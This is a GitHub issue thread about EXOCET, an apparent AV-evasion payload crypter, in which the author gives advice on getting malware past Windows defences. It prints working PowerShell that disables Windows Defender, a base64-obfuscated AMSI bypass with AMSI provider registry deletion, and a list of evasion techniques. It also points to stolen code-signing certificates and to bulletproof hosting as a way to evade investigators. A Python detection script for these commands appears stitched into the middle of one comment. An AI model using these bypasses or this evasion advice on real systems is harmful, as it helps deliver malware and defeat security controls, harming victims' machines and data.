tanc7 / EXOCET-AV-Evasion

EXOCET - AV-evading, undetectable, payload delivery tool

It has been marked as malicious by windows defender #4

Open noonewhoim opened 2 years ago

noonewhoim commented 2 years ago

Is there any way to solve it?

tanc7 commented 2 years ago

I will be working on it after my accounting exam on Wednesday. I assume go-memexec got picked up?

Sent from my iPhone


KianPrism commented 2 years ago

Any news on this?

tanc7 commented 2 years ago

Hi, sorry I am busy with multiple projects right now including Accounting and Finance classes and upcoming participation in the National Cyber League this week and a private crypto tax documentation tool utilizing the CoinGeckoAPI, but I am working on it.

Currently a proposed solution is to combine tools such as gobfuscate or garble to obfuscate the usage of package names, imports, and functions prior to the .go file payload compilation. In my test builds, I have also added full in memory shellcode execution. The current build available on GitHub actually drops a temporary file and then executes it in memory and deletes it, which I used because it was a less well-known method used to evade AV and worked in early 2020. As go-memexec is being picked up more now, I am switching to newer methods.

Since packages like gobfuscate expect an entire Go app to be made instead of targeting a specific .go file, I need to make gobfuscate or garble work in a way that it's not supposed to. My upcoming solution is to manually call the functions from the package to help conceal its activity. We will be emulating BlackRota, but not entirely copying its tactics (or it will just get picked up by AV again): https://threatpost.com/blackrota-golang-backdoor-obfuscation/161544/

I have a checklist of 15 different methods to try, like in-line hooking, reflective DLL injection, process hollowing, and remote process injection, so please be patient.

Currently, obfuscating the Go crypter that is generated is the best way to make the payload work while maintaining cross-platform compatibility. Many of the other mentioned techniques are restricted to specific platforms like Windows.

I am also willing to accept merge requests from those who would like to contribute. Currently I am looking for individuals able to write a ThreadLocalStorage Callback, a Registration of a Top-Level Exception Handler, and those who can do low-level programming by using CGO.

Sent from my iPhone


lu4p commented 2 years ago

Garble should be able to obfuscate a 'single' file, or anything which can be done in a go build command, e.g. `garble build file.go`.

tanc7 commented 2 years ago

Hi everyone, I am currently looking through the materials for the OSEP course (Offensive Security Experienced Penetration Tester). I highly recommend czonta96's link. As of right now there are tons of obstacles introduced since Windows 8.1, including but not limited to, AMSI bypasses, Windows Defender's scantime and runtime detection. That, and I am balancing multiple personal issues in my life right now, like getting my house fixed up from the FBI raid, dental appointments (their suggested bill is over $46,000 for my treatment), medical appointments, counseling appointments, and balancing between studying cyber and finance, as well as using what I have learned in my BSBA of Accounting every day.

Until I update the repo, I suggest using a combination of PowerShell scripts and .NET commands such as PowerShell Reflection, patching of running processes, and registry modifications to shut down AMSI (as it works independently of WinDefend.exe). In Windows 10, the Windows Script Host (cscript.exe) can run JScript files (it's a Microsoft version of JavaScript that can also implement .NET Assembly code as well as other MS scripting languages like VBS and WScript) to help you bypass Defender by creation of a JScript shellcode runner.

Furthermore, there is a great link from IppSec (IppSec Obfuscating Mimikatz) on dissecting the binary in question using the head -c command to slice up the binary from the beginning to find what is being flagged by signature detection, or the tail -c command to slice the bytes from the bottom, having it scanned until you reach specific byte offsets, hex dumping it with xxd -p binary, and then manually rewriting Exocet (change the offending characters and function calls from upper to lower case and vice versa, and detect whether or not it's the Exocet decrypter stub or the payload itself that requires modification).

Exocet is an extremely simple app that ingests detectable malware and adds its own layer of encoding and encryption. At the time of its release, it was undetectable for about 8 months (until I went back to prison). Now it's being detected as a variant of TrickBot and generic droppers.

Multiple Stages Required to Bypass Win10+ AV and Threat Mitigations

Any future updates that I make to EXOCET will require platform-specific bypasses. Windows requires the bypass of UAC, Defender, AMSI, AppLocker, Controlled Folder Access, Tamper Protection, SmartScreen etc. This will require the generation and execution of multiple stages before the final payload is delivered.

Killing Windows Defender

The following PowerShell commands can be run after bypassing Tamper Protection to shut down Defender:

Set-MpPreference -LowThreatDefaultAction Allow -Force
Set-MpPreference -MAPSReporting disabled -Force
Set-MpPreference -ModerateThreatDefaultAction Allow -Force
Set-MpPreference -SevereThreatDefaultAction Allow -Force
Set-MpPreference -UnknownThreatDefaultAction Allow -Force
Set-MpPreference -DisableRealtimeMonitoring $true -Force
Set-MpPreference -DisableArchiveScanning $true -Force
Set-MpPreference -DisableBehaviorMonitoring $true -Force
Set-MpPreference -DisableBlockAtFirstSeen $true -Force
Set-MpPreference -DisableEmailScanning $true -Force
Set-MpPreference -DisableIntrusionPreventionSystem $true -Force
Set-MpPreference -DisableIOAVProtection $true -Force
Set-MpPreference -DisableRealTimeMonitoring $true -Force
Set-MpPreference -DisableScriptScanning $true -Force
Set-ExecutionPolicy unrestricted -Force
cmd.exe sc stop WinDefend

AMSI Bypasses in a Powershell Stager

Fortunately, AMSI has only been adopted by 11 or so AV solutions so far, and can still be bypassed by encoding an AMSI killer one-liner in base64 like this:

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
Set-MpPreference -DisableRealtimeMonitoring $true

Code-Signing Certificate Issue (SmartScreen)

However, on my Windows 11 developer edition VM (which can be obtained here for free), mandatory code-signing checks are enforced, meaning that without a code-signing certificate from an approved vendor that works with Microsoft, running a JScript Shellcode Runner will still alert the user with SmartScreen. Fortunately, a lot of legitimate apps do not have code-signing certificates, and the end-user may be accustomed to allowing the payload to run anyway.

Attempting to legitimize the stages of your payload by purchasing code-signing certificates can start at over a thousand dollars. And while I am not going to and will not enable the conspiracy or commission of criminal activity, reusable code-signing certificates are often resold on the dark web for around the $200 range. But this part (code-signing) is something you'll figure out yourself.
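
Detection logic for the Defender and AMSI tampering commands quoted in this comment, as an added example that is not part of the EXOCET project: it scans constructed PowerShell script-block log text (Event ID 4104 ScriptBlockText, sample values built inline) and decodes the UTF-16LE base64 fragments so the hidden AmsiUtils/amsiInitFailed field names become visible to a rule. The tag names and the rule set are this example's own assumptions.

```python
import base64
import re

# Constructed ScriptBlockText samples (PowerShell Event ID 4104), not real telemetry.
SAMPLES = [
    "Set-MpPreference -ScanScheduleQuickScanTime 02:00",  # benign admin change
    "Set-MpPreference -DisableRealtimeMonitoring $true -Force",
    "Set-MpPreference -SevereThreatDefaultAction Allow -Force",
    "[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode"
    ".GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($("
    "[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("
    "'YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)",
    "Remove-Item -Path 'HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\"
    "{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse",
    "sc stop WinDefend",
]

# (tag, regex) rules; only protection-weakening Set-MpPreference switches are matched.
RULES = [
    ("defender-pref-tamper", re.compile(
        r"Set-MpPreference\b.*?-(Disable[A-Za-z]+\s+\$true"
        r"|[A-Za-z]*ThreatDefaultAction\s+Allow|MAPSReporting\s+disabled)", re.I)),
    ("defender-service-stop", re.compile(r"\bsc(\.exe)?\s+stop\s+WinDefend\b", re.I)),
    ("amsi-provider-removal", re.compile(
        r"Remove-Item\b.*HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers", re.I)),
]
EMBEDDED_B64 = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
AMSI_FIELDS = {"amsiutils", "amsiinitfailed", "amsicontext", "amsisession"}

def decode_embedded_base64(text):
    """Recover strings hidden in FromBase64String('...'); [Text.Encoding]::Unicode is UTF-16LE."""
    out = []
    for blob in EMBEDDED_B64.findall(text):
        try:
            s = base64.b64decode(blob, validate=True).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            continue
        if s.isprintable():
            out.append(s)
    return out

def classify(text):
    """Return the sorted indicator tags found in one script block ([] when clean)."""
    tags = {tag for tag, rx in RULES if rx.search(text)}
    hidden = {s.lower() for s in decode_embedded_base64(text)}
    if hidden & AMSI_FIELDS or re.search(r"amsi(utils|initfailed)", text, re.I):
        tags.add("amsi-reflection-bypass")
    return sorted(tags)
```

Feeding real 4104 events through classify() gives a per-block tag list; the benign scheduling change in SAMPLES[0] is left untagged, which is the false-positive check worth keeping when tuning the Set-MpPreference rule.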

tanc7 commented 2 years ago

Yes. But unfortunately commercial VPNs like IPVanish will respond to federal subpoenas. I read it in court discoveries of a guy in Chicago. Poor dude bought 200 hacked twitter accounts and thought he could hide behind IPVanish, then because of that he got superseded by CFAA after being charged with terrorism.

Best option is to use bulletproof VPNs or even better, make your own VPN with WireGuard. I wouldn’t trust IPSec.

Anyways I'm through with black hat stuff and just play CTFs now and periodically write code, as well as pursuing my second college degree and managing my family's brokerage account on Fidelity. My supervised release conditions forbid me from any job involving computers or handling personally identifiable information, even as a cashier at Walmart. Planning to move to Argentina when my 29 months are up.

On Sun, Jan 23, 2022 at 7:37 PM Mart3s @.***> wrote:

Your house fixed by FBI raid lol A good VPN is a thing to prevent that annoyers from knocking your door


tanc7 commented 2 years ago

I can only answer this question in a manner that it could not incriminate me or get me indicted. I suggest heavy research into “bulletproof hosting” providers, spin up a VPS and convert it into a client-to-site VPN. AlgoVPN does just that, which is a collection of Ansible scripts to quickly configure a secure WireGuard VPN endpoint.

https://github.com/trailofbits/algo

If you own the data, and have firm control over who logs it, you're "mostly" clean. You just have to trust your hosting providers. Some of them offer warrant canaries, usually a PGP key to verify the service they are providing is "solid".

On the flip side, some bulletproof hosting providers have flipped to the Feds, I personally know a handful of inmates who confirmed it from the InFraud Indictment in Federal prison in Pahrump, NV.

Just be careful and do clear research.

I even shook R. Kelly’s hand at Chicago MCC in late 2019.

Sent from my iPhone

On Jan 24, 2022, at 4:30 AM, Mart3s @.***> wrote:

 Is Nord VPN good?
